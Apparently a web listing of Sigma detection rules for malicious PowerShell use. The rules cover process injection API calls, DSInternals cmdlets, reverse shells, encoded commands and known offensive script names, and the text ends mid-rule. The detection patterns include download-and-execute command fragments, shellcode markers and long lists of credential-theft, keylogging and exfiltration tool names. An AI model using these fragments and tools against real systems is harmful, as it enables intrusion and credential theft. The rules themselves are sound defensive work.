related
high
Potential WinAPI Calls Via PowerShell Scripts
Detects use of WinAPI functions in PowerShell scripts
status test
author Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community
id 03d83090-8cba-44a0-b02f-0b756a050306
license Sigma · DRL-1.1
view Sigma YAML
title: Potential WinAPI Calls Via PowerShell Scripts
id: 03d83090-8cba-44a0-b02f-0b756a050306
related:
- id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702
type: similar
status: test
description: Detects use of WinAPI functions in PowerShell scripts
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: Nasreddine Bencherchali (Nextron Systems), Nikita Nazarov, oscd.community
date: 2020-10-06
modified: 2023-06-20
tags:
- attack.execution
- attack.t1059.001
- attack.t1106
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
# Note: Add more suspicious combinations in the form of different selections
selection_injection:
ScriptBlockText|contains|all:
- 'VirtualAlloc'
- 'OpenProcess'
- 'WriteProcessMemory'
- 'CreateRemoteThread'
selection_token_steal:
ScriptBlockText|contains|all:
- 'OpenProcessToken'
- 'LookupPrivilegeValue'
- 'AdjustTokenPrivileges'
selection_duplicate_token:
ScriptBlockText|contains|all:
- 'OpenProcessToken'
- 'DuplicateTokenEx'
- 'CloseHandle'
selection_process_write_read:
ScriptBlockText|contains|all:
- 'WriteProcessMemory'
- 'VirtualAlloc'
- 'ReadProcessMemory'
- 'VirtualFree'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
related
high
DSInternals Suspicious PowerShell Cmdlets - ScriptBlock
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
status test
author Nasreddine Bencherchali (Nextron Systems)
id 846c7a87-8e14-4569-9d49-ecfd4276a01c
license Sigma · DRL-1.1
view Sigma YAML
title: DSInternals Suspicious PowerShell Cmdlets - ScriptBlock
id: 846c7a87-8e14-4569-9d49-ecfd4276a01c
related:
- id: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e
type: similar
status: test
description: |
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
references:
- https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-06-26
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Add-ADDBSidHistory'
- 'Add-ADNgcKey'
- 'Add-ADReplNgcKey'
- 'ConvertFrom-ADManagedPasswordBlob'
- 'ConvertFrom-GPPrefPassword'
- 'ConvertFrom-ManagedPasswordBlob'
- 'ConvertFrom-UnattendXmlPassword'
- 'ConvertFrom-UnicodePassword'
- 'ConvertTo-AADHash'
- 'ConvertTo-GPPrefPassword'
- 'ConvertTo-KerberosKey'
- 'ConvertTo-LMHash'
- 'ConvertTo-MsoPasswordHash'
- 'ConvertTo-NTHash'
- 'ConvertTo-OrgIdHash'
- 'ConvertTo-UnicodePassword'
- 'Disable-ADDBAccount'
- 'Enable-ADDBAccount'
- 'Get-ADDBAccount'
- 'Get-ADDBBackupKey'
- 'Get-ADDBDomainController'
- 'Get-ADDBGroupManagedServiceAccount'
- 'Get-ADDBKdsRootKey'
- 'Get-ADDBSchemaAttribute'
- 'Get-ADDBServiceAccount'
- 'Get-ADDefaultPasswordPolicy'
- 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'
- 'Get-ADPasswordPolicy'
- 'Get-ADReplAccount'
- 'Get-ADReplBackupKey'
- 'Get-ADReplicationAccount'
- 'Get-ADSIAccount'
- 'Get-AzureADUserEx'
- 'Get-BootKey'
- 'Get-KeyCredential'
- 'Get-LsaBackupKey'
- 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'
- 'Get-SamPasswordPolicy'
- 'Get-SysKey'
- 'Get-SystemKey'
- 'New-ADDBRestoreFromMediaScript'
- 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'
- 'New-ADNgcKey'
- 'New-NTHashSet'
- 'Remove-ADDBObject'
- 'Save-DPAPIBlob'
- 'Set-ADAccountPasswordHash'
- 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'
- 'Set-ADDBBootKey'
- 'Set-ADDBDomainController'
- 'Set-ADDBPrimaryGroup'
- 'Set-ADDBSysKey'
- 'Set-AzureADUserEx'
- 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'
- 'Set-SamAccountPasswordHash'
- 'Set-WinUserPasswordHash'
- 'Test-ADDBPasswordQuality'
- 'Test-ADPasswordQuality'
- 'Test-ADReplPasswordQuality'
- 'Test-PasswordQuality'
- 'Unlock-ADDBAccount'
- 'Write-ADNgcKey'
- 'Write-ADReplNgcKey'
condition: selection
falsepositives:
- Legitimate usage of DSInternals for administration or audit purpose.
level: high
related
high
NTFS Alternate Data Stream
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
status test
author Sami Ruohonen
id 8c521530-5169-495d-a199-0a3a881ad24e
license Sigma · DRL-1.1
view Sigma YAML
title: NTFS Alternate Data Stream
id: 8c521530-5169-495d-a199-0a3a881ad24e
status: test
description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
references:
- https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
author: Sami Ruohonen
date: 2018-07-24
modified: 2022-12-25
tags:
- attack.stealth
- attack.t1564.004
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_content:
ScriptBlockText|contains:
- set-content
- add-content
selection_stream:
ScriptBlockText|contains: '-stream'
condition: all of selection*
falsepositives:
- Unknown
level: high
related
high
PowerShell ShellCode
Detects Base64 encoded Shellcode
status test
author David Ledbetter (shellcode), Florian Roth (Nextron Systems)
id 16b37b70-6fcf-4814-a092-c36bd3aafcbd
license Sigma · DRL-1.1
view Sigma YAML
title: PowerShell ShellCode
id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd
status: test
description: Detects Base64 encoded Shellcode
references:
- https://twitter.com/cyb3rops/status/1063072865992523776
author: David Ledbetter (shellcode), Florian Roth (Nextron Systems)
date: 2018-11-17
modified: 2024-01-25
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'OiCAAAAYInlM'
- 'OiJAAAAYInlM'
condition: selection
falsepositives:
- Unknown
level: high
related
high
WMImplant Hack Tool
Detects parameters used by WMImplant
status test
author NVISO
id 8028c2c3-e25a-46e3-827f-bbb5abf181d7
license Sigma · DRL-1.1
view Sigma YAML
title: WMImplant Hack Tool
id: 8028c2c3-e25a-46e3-827f-bbb5abf181d7
status: test
description: Detects parameters used by WMImplant
references:
- https://github.com/FortyNorthSecurity/WMImplant
author: NVISO
date: 2020-03-26
modified: 2022-12-25
tags:
- attack.execution
- attack.t1047
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'WMImplant'
- ' change_user '
- ' gen_cli '
- ' command_exec '
- ' disable_wdigest '
- ' disable_winrm '
- ' enable_wdigest '
- ' enable_winrm '
- ' registry_mod '
- ' remote_posh '
- ' sched_job '
- ' service_mod '
- ' process_kill '
# - ' process_start '
- ' active_users '
- ' basic_info '
# - ' drive_list '
# - ' installed_programs '
- ' power_off '
- ' vacant_system '
- ' logon_events '
condition: selection
falsepositives:
- Administrative scripts that use the same keywords.
level: high
related
high
PSAsyncShell - Asynchronous TCP Reverse Shell
Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell
status test
author Nasreddine Bencherchali (Nextron Systems)
id afd3df04-948d-46f6-ae44-25966c44b97f
license Sigma · DRL-1.1
view Sigma YAML
title: PSAsyncShell - Asynchronous TCP Reverse Shell
id: afd3df04-948d-46f6-ae44-25966c44b97f
status: test
description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell
references:
- https://github.com/JoelGMSec/PSAsyncShell
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-04
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains: 'PSAsyncShell'
condition: selection
falsepositives:
- Unlikely
level: high
related
high
Potential Remote PowerShell Session Initiated
Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.
This could potentially indicates a remote PowerShell connection.
status test
author Roberto Rodriguez @Cyb3rWard0g
id c539afac-c12a-46ed-b1bd-5a5567c9f045
license Sigma · DRL-1.1
view Sigma YAML
title: Potential Remote PowerShell Session Initiated
id: c539afac-c12a-46ed-b1bd-5a5567c9f045
status: test
description: |
Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.
This could potentially indicates a remote PowerShell connection.
references:
- https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-09-12
modified: 2024-02-02
tags:
- attack.execution
- attack.t1059.001
- attack.lateral-movement
- attack.t1021.006
logsource:
category: network_connection
product: windows
detection:
selection:
DestinationPort:
- 5985
- 5986
Initiated: 'true' # only matches of the initiating system can be evaluated
SourceIsIpv6: 'false'
filter_main_service_users:
- User|contains: # covers many language settings for Network Service. Please expand
- 'NETWORK SERVICE'
- 'NETZWERKDIENST'
- 'SERVICIO DE RED'
- 'SERVIZIO DI RETE'
- User|contains|all:
- 'SERVICE R'
- 'SEAU'
filter_main_localhost:
SourceIp:
- '::1'
- '127.0.0.1'
DestinationIp:
- '::1'
- '127.0.0.1'
filter_optional_avast:
Image:
- 'C:\Program Files\Avast Software\Avast\AvastSvc.exe'
- 'C:\Program Files (x86)\Avast Software\Avast\AvastSvc.exe'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.
- Network Service user name of a not-covered localization
level: high
related
high
Malicious PowerShell Scripts - FileCreation
Detects the creation of known offensive powershell scripts used for exploitation
status test
author Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
id f331aa1f-8c53-4fc3-b083-cc159bc971cb
license Sigma · DRL-1.1
view Sigma YAML
title: Malicious PowerShell Scripts - FileCreation
id: f331aa1f-8c53-4fc3-b083-cc159bc971cb
related:
- id: 41025fd7-0466-4650-a813-574aaacbe7f4
type: similar
status: test
description: Detects the creation of known offensive powershell scripts used for exploitation
references:
- https://github.com/PowerShellMafia/PowerSploit
- https://github.com/NetSPI/PowerUpSQL
- https://github.com/CsEnox/EventViewer-UACBypass
- https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu
- https://github.com/nettitude/Invoke-PowerThIEf
- https://github.com/S3cur3Th1sSh1t/WinPwn
- https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
- https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
- https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
- https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
- https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
- https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
- https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
- https://github.com/HarmJ0y/DAMP
- https://github.com/samratashok/nishang
- https://github.com/DarkCoderSc/PowerRunAsSystem/
- https://github.com/besimorhino/powercat
- https://github.com/Kevin-Robertson/Powermad
- https://github.com/adrecon/ADRecon
- https://github.com/adrecon/AzureADRecon
- https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1
- https://github.com/The-Viper-One/Invoke-PowerDPAPI/
- https://github.com/Arno0x/DNSExfiltrator/
author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
date: 2018-04-07
modified: 2025-12-10
tags:
- attack.execution
- attack.t1059.001
logsource:
category: file_event
product: windows
detection:
selection_generic:
TargetFilename|endswith:
# Note: Please ensure alphabetical order when adding new entries
- '\Add-ConstrainedDelegationBackdoor.ps1'
- '\Add-Exfiltration.ps1'
- '\Add-Persistence.ps1'
- '\Add-RegBackdoor.ps1'
- '\Add-RemoteRegBackdoor.ps1'
- '\Add-ScrnSaveBackdoor.ps1'
- '\ADRecon.ps1'
- '\AzureADRecon.ps1'
- '\BadSuccessor.ps1'
- '\Check-VM.ps1'
- '\ConvertTo-ROT13.ps1'
- '\Copy-VSS.ps1'
- '\Create-MultipleSessions.ps1'
- '\DNS_TXT_Pwnage.ps1'
- '\dnscat2.ps1'
- '\Do-Exfiltration.ps1'
- '\DomainPasswordSpray.ps1'
- '\Download_Execute.ps1'
- '\Download-Execute-PS.ps1'
- '\Enable-DuplicateToken.ps1'
- '\Enabled-DuplicateToken.ps1'
- '\Execute-Command-MSSQL.ps1'
- '\Execute-DNSTXT-Code.ps1'
- '\Execute-OnTime.ps1'
- '\ExetoText.ps1'
- '\Exploit-Jboss.ps1'
- '\Find-AVSignature.ps1'
- '\Find-Fruit.ps1'
- '\Find-GPOLocation.ps1'
- '\Find-TrustedDocuments.ps1'
- '\FireBuster.ps1'
- '\FireListener.ps1'
- '\Get-ApplicationHost.ps1'
- '\Get-ChromeDump.ps1'
- '\Get-ClipboardContents.ps1'
- '\Get-ComputerDetail.ps1'
- '\Get-FoxDump.ps1'
- '\Get-GPPAutologon.ps1'
- '\Get-GPPPassword.ps1'
- '\Get-IndexedItem.ps1'
- '\Get-Keystrokes.ps1'
- '\Get-LSASecret.ps1'
- '\Get-MicrophoneAudio.ps1'
- '\Get-PassHashes.ps1'
- '\Get-PassHints.ps1'
- '\Get-RegAlwaysInstallElevated.ps1'
- '\Get-RegAutoLogon.ps1'
- '\Get-RickAstley.ps1'
- '\Get-Screenshot.ps1'
- '\Get-SecurityPackages.ps1'
- '\Get-ServiceFilePermission.ps1'
- '\Get-ServicePermission.ps1'
- '\Get-ServiceUnquoted.ps1'
- '\Get-SiteListPassword.ps1'
- '\Get-System.ps1'
- '\Get-TimedScreenshot.ps1'
- '\Get-UnattendedInstallFile.ps1'
- '\Get-Unconstrained.ps1'
- '\Get-USBKeystrokes.ps1'
- '\Get-VaultCredential.ps1'
- '\Get-VulnAutoRun.ps1'
- '\Get-VulnSchTask.ps1'
- '\Get-WebConfig.ps1'
- '\Get-WebCredentials.ps1'
- '\Get-WLAN-Keys.ps1'
- '\Gupt-Backdoor.ps1'
- '\HTTP-Backdoor.ps1'
- '\HTTP-Login.ps1'
- '\Install-ServiceBinary.ps1'
- '\Install-SSP.ps1'
- '\Invoke-ACLScanner.ps1'
- '\Invoke-ADSBackdoor.ps1'
- '\Invoke-AmsiBypass.ps1'
- '\Invoke-ARPScan.ps1'
- '\Invoke-BackdoorLNK.ps1'
- '\Invoke-BadPotato.ps1'
- '\Invoke-BetterSafetyKatz.ps1'
- '\Invoke-BruteForce.ps1'
- '\Invoke-BypassUAC.ps1'
- '\Invoke-Carbuncle.ps1'
- '\Invoke-Certify.ps1'
- '\Invoke-ConPtyShell.ps1'
- '\Invoke-CredentialInjection.ps1'
- '\Invoke-CredentialsPhish.ps1'
- '\Invoke-DAFT.ps1'
- '\Invoke-DCSync.ps1'
- '\Invoke-Decode.ps1'
- '\Invoke-DinvokeKatz.ps1'
- '\Invoke-DllInjection.ps1'
- '\Invoke-DNSExfiltrator.ps1'
- '\Invoke-DNSUpdate.ps1'
- '\Invoke-DowngradeAccount.ps1'
- '\Invoke-EgressCheck.ps1'
- '\Invoke-Encode.ps1'
- '\Invoke-EventViewer.ps1'
- '\Invoke-Eyewitness.ps1'
- '\Invoke-FakeLogonScreen.ps1'
- '\Invoke-Farmer.ps1'
- '\Invoke-Get-RBCD-Threaded.ps1'
- '\Invoke-Gopher.ps1'
- '\Invoke-Grouper2.ps1'
- '\Invoke-Grouper3.ps1'
- '\Invoke-HandleKatz.ps1'
- '\Invoke-Interceptor.ps1'
- '\Invoke-Internalmonologue.ps1'
- '\Invoke-Inveigh.ps1'
- '\Invoke-InveighRelay.ps1'
- '\Invoke-JSRatRegsvr.ps1'
- '\Invoke-JSRatRundll.ps1'
- '\Invoke-KrbRelay.ps1'
- '\Invoke-KrbRelayUp.ps1'
- '\Invoke-LdapSignCheck.ps1'
- '\Invoke-Lockless.ps1'
- '\Invoke-MalSCCM.ps1'
- '\Invoke-Mimikatz.ps1'
- '\Invoke-MimikatzWDigestDowngrade.ps1'
- '\Invoke-Mimikittenz.ps1'
- '\Invoke-MITM6.ps1'
- '\Invoke-NanoDump.ps1'
- '\Invoke-NetRipper.ps1'
- '\Invoke-NetworkRelay.ps1'
- '\Invoke-NinjaCopy.ps1'
- '\Invoke-OxidResolver.ps1'
- '\Invoke-P0wnedshell.ps1'
- '\Invoke-P0wnedshellx86.ps1'
- '\Invoke-Paranoia.ps1'
- '\Invoke-PortScan.ps1'
- '\Invoke-PoshRatHttp.ps1'
- '\Invoke-PoshRatHttps.ps1'
- '\Invoke-PostExfil.ps1'
- '\Invoke-PowerDump.ps1'
- '\Invoke-PowerDPAPI.ps1'
- '\Invoke-PowerShellIcmp.ps1'
- '\Invoke-PowerShellTCP.ps1'
- '\Invoke-PowerShellTcpOneLine.ps1'
- '\Invoke-PowerShellTcpOneLineBind.ps1'
- '\Invoke-PowerShellUdp.ps1'
- '\Invoke-PowerShellUdpOneLine.ps1'
- '\Invoke-PowerShellWMI.ps1'
- '\Invoke-PowerThIEf.ps1'
- '\Invoke-PPLDump.ps1'
- '\Invoke-Prasadhak.ps1'
- '\Invoke-PsExec.ps1'
- '\Invoke-PsGcat.ps1'
- '\Invoke-PsGcatAgent.ps1'
- '\Invoke-PSInject.ps1'
- '\Invoke-PsUaCme.ps1'
- '\Invoke-ReflectivePEInjection.ps1'
- '\Invoke-ReverseDNSLookup.ps1'
- '\Invoke-Rubeus.ps1'
- '\Invoke-RunAs.ps1'
- '\Invoke-SafetyKatz.ps1'
- '\Invoke-SauronEye.ps1'
- '\Invoke-SCShell.ps1'
- '\Invoke-Seatbelt.ps1'
- '\Invoke-ServiceAbuse.ps1'
- '\Invoke-SessionGopher.ps1'
- '\Invoke-ShellCode.ps1'
- '\Invoke-SMBScanner.ps1'
- '\Invoke-Snaffler.ps1'
- '\Invoke-Spoolsample.ps1'
- '\Invoke-SSHCommand.ps1'
- '\Invoke-SSIDExfil.ps1'
- '\Invoke-StandIn.ps1'
- '\Invoke-StickyNotesExtract.ps1'
- '\Invoke-Tater.ps1'
- '\Invoke-Thunderfox.ps1'
- '\Invoke-ThunderStruck.ps1'
- '\Invoke-TokenManipulation.ps1'
- '\Invoke-Tokenvator.ps1'
- '\Invoke-TotalExec.ps1'
- '\Invoke-UrbanBishop.ps1'
- '\Invoke-UserHunter.ps1'
- '\Invoke-VoiceTroll.ps1'
- '\Invoke-Whisker.ps1'
- '\Invoke-WinEnum.ps1'
- '\Invoke-winPEAS.ps1'
- '\Invoke-WireTap.ps1'
- '\Invoke-WmiCommand.ps1'
- '\Invoke-WScriptBypassUAC.ps1'
- '\Invoke-Zerologon.ps1'
- '\Keylogger.ps1'
- '\MailRaider.ps1'
- '\New-HoneyHash.ps1'
- '\OfficeMemScraper.ps1'
- '\Offline_Winpwn.ps1'
- '\Out-CHM.ps1'
- '\Out-DnsTxt.ps1'
- '\Out-Excel.ps1'
- '\Out-HTA.ps1'
- '\Out-Java.ps1'
- '\Out-JS.ps1'
- '\Out-Minidump.ps1'
- '\Out-RundllCommand.ps1'
- '\Out-SCF.ps1'
- '\Out-SCT.ps1'
- '\Out-Shortcut.ps1'
- '\Out-WebQuery.ps1'
- '\Out-Word.ps1'
- '\Parse_Keys.ps1'
- '\Port-Scan.ps1'
- '\PowerBreach.ps1'
- '\powercat.ps1'
- '\Powermad.ps1'
- '\PowerRunAsSystem.psm1'
- '\PowerSharpPack.ps1'
- '\PowerUp.ps1'
- '\PowerUpSQL.ps1'
- '\PowerView.ps1'
- '\PSAsyncShell.ps1'
- '\RemoteHashRetrieval.ps1'
- '\Remove-Persistence.ps1'
- '\Remove-PoshRat.ps1'
- '\Remove-Update.ps1'
- '\Run-EXEonRemote.ps1'
- '\Schtasks-Backdoor.ps1'
- '\Set-DCShadowPermissions.ps1'
- '\Set-MacAttribute.ps1'
- '\Set-RemotePSRemoting.ps1'
- '\Set-RemoteWMI.ps1'
- '\Set-Wallpaper.ps1'
- '\Show-TargetScreen.ps1'
- '\Speak.ps1'
- '\Start-CaptureServer.ps1'
- '\Start-WebcamRecorder.ps1'
- '\StringToBase64.ps1'
- '\TexttoExe.ps1'
- '\Veeam-Get-Creds.ps1'
- '\VolumeShadowCopyTools.ps1'
- '\WinPwn.ps1'
- '\WSUSpendu.ps1'
selection_invoke_sharp:
TargetFilename|contains: 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
TargetFilename|endswith: '.ps1'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
related
high
BloodHound Collection Files
Detects default file names outputted by the BloodHound collection tool SharpHound
status test
author C.J. May
id 02773bed-83bf-469f-b7ff-e676e7d78bab
license Sigma · DRL-1.1
view Sigma YAML
title: BloodHound Collection Files
id: 02773bed-83bf-469f-b7ff-e676e7d78bab
status: test
description: Detects default file names outputted by the BloodHound collection tool SharpHound
references:
- https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection
author: C.J. May
date: 2022-08-09
modified: 2026-02-19
tags:
- attack.discovery
- attack.t1087.001
- attack.t1087.002
- attack.t1482
- attack.t1069.001
- attack.t1069.002
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith:
- 'BloodHound.zip'
- '_computers.json'
- '_containers.json'
# - '_domains.json' # prone to false positives with ProbabilisticRevealTokenRegistry function in Google Chrome
- '_gpos.json'
- '_groups.json'
- '_ous.json'
- '_users.json'
filter_optional_ms_winapps:
Image|endswith: '\svchost.exe'
TargetFilename|startswith: 'C:\Program Files\WindowsApps\Microsoft.'
TargetFilename|endswith: '\pocket_containers.json'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise
level: high
related
high
Suspicious Interactive PowerShell as SYSTEM
Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
status test
author Florian Roth (Nextron Systems)
id 5b40a734-99b6-4b98-a1d0-1cea51a08ab2
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious Interactive PowerShell as SYSTEM
id: 5b40a734-99b6-4b98-a1d0-1cea51a08ab2
status: test
description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
references:
- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2022-08-13
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename:
- 'C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
- 'C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive'
condition: selection
falsepositives:
- Administrative activity
- PowerShell scripts running as SYSTEM user
level: high
related
high
Execution of Powershell Script in Public Folder
This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
status test
author Max Altgelt (Nextron Systems)
id fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4
license Sigma · DRL-1.1
view Sigma YAML
title: Execution of Powershell Script in Public Folder
id: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4
status: test
description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
references:
- https://www.mandiant.com/resources/evolution-of-fin7
author: Max Altgelt (Nextron Systems)
date: 2022-04-06
modified: 2022-07-14
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains:
- '-f C:\Users\Public'
- '-f "C:\Users\Public'
- '-f %Public%'
- '-fi C:\Users\Public'
- '-fi "C:\Users\Public'
- '-fi %Public%'
- '-fil C:\Users\Public'
- '-fil "C:\Users\Public'
- '-fil %Public%'
- '-file C:\Users\Public'
- '-file "C:\Users\Public'
- '-file %Public%'
condition: selection
falsepositives:
- Unlikely
level: high
related
high
Suspicious Encoded PowerShell Command Line
Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
status test
author Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
id ca2092a1-c273-4878-9b4b-0d60115bf5ea
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious Encoded PowerShell Command Line
id: ca2092a1-c273-4878-9b4b-0d60115bf5ea
status: test
description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
references:
- https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e
author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
date: 2018-09-03
modified: 2023-04-06
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli_enc:
CommandLine|contains: ' -e' # covers -en and -enc
selection_cli_content:
CommandLine|contains:
- ' JAB'
- ' SUVYI'
- ' SQBFAFgA'
- ' aQBlAHgA'
- ' aWV4I'
- ' IAA'
- ' IAB'
- ' UwB'
- ' cwB'
selection_standalone:
CommandLine|contains:
- '.exe -ENCOD '
- ' BA^J e-' # Reversed
filter_optional_remote_signed:
CommandLine|contains: ' -ExecutionPolicy remotesigned '
condition: selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*
level: high
related
high
Suspicious PowerShell Download and Execute Pattern
Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
status test
author Florian Roth (Nextron Systems)
id e6c54d94-498c-4562-a37c-b469d8e9a275
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious PowerShell Download and Execute Pattern
id: e6c54d94-498c-4562-a37c-b469d8e9a275
related:
- id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
type: derived
status: test
description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
references:
- https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
- https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
author: Florian Roth (Nextron Systems)
date: 2022-02-28
modified: 2022-03-01
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: # make sure that your backend applies the strings case-insensitive
- 'IEX ((New-Object Net.WebClient).DownloadString'
- 'IEX (New-Object Net.WebClient).DownloadString'
- 'IEX((New-Object Net.WebClient).DownloadString'
- 'IEX(New-Object Net.WebClient).DownloadString'
- ' -command (New-Object System.Net.WebClient).DownloadFile('
- ' -c (New-Object System.Net.WebClient).DownloadFile('
condition: selection
falsepositives:
- Software installers that pull packages from remote systems and execute them
level: high
related
high
HackTool - Empire PowerShell Launch Parameters
Detects suspicious powershell command line parameters used in Empire
status test
author Florian Roth (Nextron Systems)
id 79f4ede3-402e-41c8-bc3e-ebbf5f162581
license Sigma · DRL-1.1
view Sigma YAML
title: HackTool - Empire PowerShell Launch Parameters
id: 79f4ede3-402e-41c8-bc3e-ebbf5f162581
status: test
description: Detects suspicious powershell command line parameters used in Empire
references:
- https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
